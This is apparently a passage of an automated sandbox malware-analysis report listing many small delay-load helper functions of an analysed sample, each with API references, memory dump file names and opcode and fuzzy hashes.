                  • Opcode ID: 2ec3e5325c79ce8e930de6381797d2db6934c49da509d4d58c681c6c180c7273
                  • Instruction ID: 6c7f316233fa51589f3412ffa3fd6f5da9586f9e40dcb1208ea7b5ba5494f538
                  • Opcode Fuzzy Hash: 2ec3e5325c79ce8e930de6381797d2db6934c49da509d4d58c681c6c180c7273
                  • Instruction Fuzzy Hash: 3EB012B367C406BE710C61897F02E37039CE4C1B11334C92AB509D00C0D5806C0D0931
                  Function 00A0DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: dc9a420b24404ccf1958f0208bd1e605ff9101e868ec01e8844f91a5f8300b9e
                  • Instruction ID: 77a24a89c45ee54b3b7cf91e7355ca97512e3a8aa746a0fd2587161708f04fc8
                  • Opcode Fuzzy Hash: dc9a420b24404ccf1958f0208bd1e605ff9101e868ec01e8844f91a5f8300b9e
                  • Instruction Fuzzy Hash: 7BB012B337D106FD7108718D7E02E3A035CD0C4B21330C92BF809C40C8D5845C088931
                  Function 00A0DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: a32504f42c8c5bbcf0220ae795b9d3948f29a2e5ab6d50628ed35e6420c3284e
                  • Instruction ID: cce4ce2c6c9f576c289837f9f4ac230f332b2c045ca28548c36db6399622a1d0
                  • Opcode Fuzzy Hash: a32504f42c8c5bbcf0220ae795b9d3948f29a2e5ab6d50628ed35e6420c3284e
                  • Instruction Fuzzy Hash: DCB092A236D006AD610861897A02A3A0268E088B11320892AB509C40C895805C098931
                  Function 00A0DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DBD5
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 8a9474d9ed77178757a0b4df275dd95baeb9732afaa5785d6259e087521ec849
                  • Instruction ID: a56e8e8e7ed939055e1ce4d0f8c59ad601678bc51381073438fccf3fb9a912f7
                  • Opcode Fuzzy Hash: 8a9474d9ed77178757a0b4df275dd95baeb9732afaa5785d6259e087521ec849
                  • Instruction Fuzzy Hash: 02B092A726900ABD610851883A06A760238E481B21321882AB909C10C4D9904C084531
                  Function 00A0DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DBD5
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 4f32b5b8e7d94bc3994afc40d8bf7a1de2a36d37c80807b0e8f8ff8f6e5e6262
                  • Instruction ID: 1fea12249f433f762a5682276dec63bdebf2c74cfc2bf8cdf1154610c2da8f96
                  • Opcode Fuzzy Hash: 4f32b5b8e7d94bc3994afc40d8bf7a1de2a36d37c80807b0e8f8ff8f6e5e6262
                  • Instruction Fuzzy Hash: C1B012A737D00BBD714C51883F07E77033CE4C1B11331C83ABA09C00C0D9904C094531
                  Function 00A0DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DBD5
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: f2e5587b67beea984b827ae7c8cfa37ec97a1b0ae67aa9d29b43eb96c8422133
                  • Instruction ID: 4b2cd6bb09c28fc083453e32c8591a52bcab75055114591c8e227b4aa63dabe3
                  • Opcode Fuzzy Hash: f2e5587b67beea984b827ae7c8cfa37ec97a1b0ae67aa9d29b43eb96c8422133
                  • Instruction Fuzzy Hash: 0EB012A737D10FBD720811843E07D77033CE4C1B11331893AB905D00C0D9904C4C4431
                  Function 00A0DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DBD5
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 0f0dac1f1b2e9031039a3bf2177311b3e0e9f9a97489b36077042a5d1ffe0e3e
                  • Instruction ID: f3634ef295590d1fe563d013a944f5444ff41aa9551f01aa71c913aae20e0abe
                  • Opcode Fuzzy Hash: 0f0dac1f1b2e9031039a3bf2177311b3e0e9f9a97489b36077042a5d1ffe0e3e
                  • Instruction Fuzzy Hash: 9AB012E73BD00ABD710851983E07F77033CF4C1B11331883AB90AC10C0D9904C0C4531
                  Function 00A0DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: e450f80d677c222cb878774a46cdefc98ad4c669870cb76ec7f65feb9c55e82a
                  • Instruction ID: 46270f4d7eb1428ef3244ce462aa67286ddfda71c9dcd501dca60517b88a0eff
                  • Opcode Fuzzy Hash: e450f80d677c222cb878774a46cdefc98ad4c669870cb76ec7f65feb9c55e82a
                  • Instruction Fuzzy Hash: CAB012A33BD10ABDB108718D7E02F3B035CF0C4B11330893BF409C40C8D5806C088A31
                  Function 00A0DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DC36
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: aa9e34094698a2dd3da8e5b443362127465f48a18b3417d13903f2ee3d60cab2
                  • Instruction ID: f82b6724412590eda623f4a0992efc923ad1f4a440fef6356695584aea1a32fe
                  • Opcode Fuzzy Hash: aa9e34094698a2dd3da8e5b443362127465f48a18b3417d13903f2ee3d60cab2
                  • Instruction Fuzzy Hash: 6EB012B767C20ABD710C21947F02D37033CE5C0B113358F2AB605E00C499C06C485431
                  Function 00A0DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DC36
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: ae703fccf936ef4cedd874ffce3bf1f885ce2d5efd2c30a645a3097b438ce542
                  • Instruction ID: 40b5ef745a8003bb8d769b3af2fee37cb4d774ec575d04a8fdabae690380eba6
                  • Opcode Fuzzy Hash: ae703fccf936ef4cedd874ffce3bf1f885ce2d5efd2c30a645a3097b438ce542
                  • Instruction Fuzzy Hash: 55B012B767C106BD710C61987E02E37033CE4C5B11334CE2ABA09D00C4D5C05C084531
                  Function 00A0DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DC36
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 1649336729a57e780811f4d1f363a9d1e8085e6f80933ca8db88563d84db5d0b
                  • Instruction ID: 0cd6a6baacb0e4b2e89017bfa28b3ff5d325438f9544a532282f515bc242922d
                  • Opcode Fuzzy Hash: 1649336729a57e780811f4d1f363a9d1e8085e6f80933ca8db88563d84db5d0b
                  • Instruction Fuzzy Hash: 70B012B767C206BD710C61A87E02E3B033CF4C0B113348E2BB609D00C4D5C05C084531
                  Function 00A0D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6f643e70b4df78867c35ce8e1a391ff537ec5199de0c245bd7271aa23edaa4e1
                  • Instruction ID: 4c6c0999a2f30ce1b22f267587ec6f72a32b4d989e246d2cd25caf4398f60636
                  • Opcode Fuzzy Hash: 6f643e70b4df78867c35ce8e1a391ff537ec5199de0c245bd7271aa23edaa4e1
                  • Instruction Fuzzy Hash: 71A011A3ABC00BBEB0082280BE02C3A032CC8C0B20338CC2AB00AA00C0A88028080830
                  Function 00A0D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: f824ba8052ddb2f3dcb462e86af33f263b12389bf78bb99056b1def5ab73e629
                  • Instruction ID: 4c6c0999a2f30ce1b22f267587ec6f72a32b4d989e246d2cd25caf4398f60636
                  • Opcode Fuzzy Hash: f824ba8052ddb2f3dcb462e86af33f263b12389bf78bb99056b1def5ab73e629
                  • Instruction Fuzzy Hash: 71A011A3ABC00BBEB0082280BE02C3A032CC8C0B20338CC2AB00AA00C0A88028080830
                  Function 00A0D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6d6f7f46ea3852ddef3bc1852b9dee1d600467d2dcc3e51fb0303b99588942b1
                  • Instruction ID: 4c6c0999a2f30ce1b22f267587ec6f72a32b4d989e246d2cd25caf4398f60636
                  • Opcode Fuzzy Hash: 6d6f7f46ea3852ddef3bc1852b9dee1d600467d2dcc3e51fb0303b99588942b1
                  • Instruction Fuzzy Hash: 71A011A3ABC00BBEB0082280BE02C3A032CC8C0B20338CC2AB00AA00C0A88028080830
                  Function 00A0D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 12b1efc08601a33125730c91fca72210a84de3a11164253e6763caa888c80658
                  • Instruction ID: 4c6c0999a2f30ce1b22f267587ec6f72a32b4d989e246d2cd25caf4398f60636
                  • Opcode Fuzzy Hash: 12b1efc08601a33125730c91fca72210a84de3a11164253e6763caa888c80658
                  • Instruction Fuzzy Hash: 71A011A3ABC00BBEB0082280BE02C3A032CC8C0B20338CC2AB00AA00C0A88028080830
                  Function 00A0D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: a924812ba1f07bd0cd95522d9461194859abf9830678cfb76a58120ece93be2b
                  • Instruction ID: 4c6c0999a2f30ce1b22f267587ec6f72a32b4d989e246d2cd25caf4398f60636
                  • Opcode Fuzzy Hash: a924812ba1f07bd0cd95522d9461194859abf9830678cfb76a58120ece93be2b
                  • Instruction Fuzzy Hash: 71A011A3ABC00BBEB0082280BE02C3A032CC8C0B20338CC2AB00AA00C0A88028080830
                  Function 00A0D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
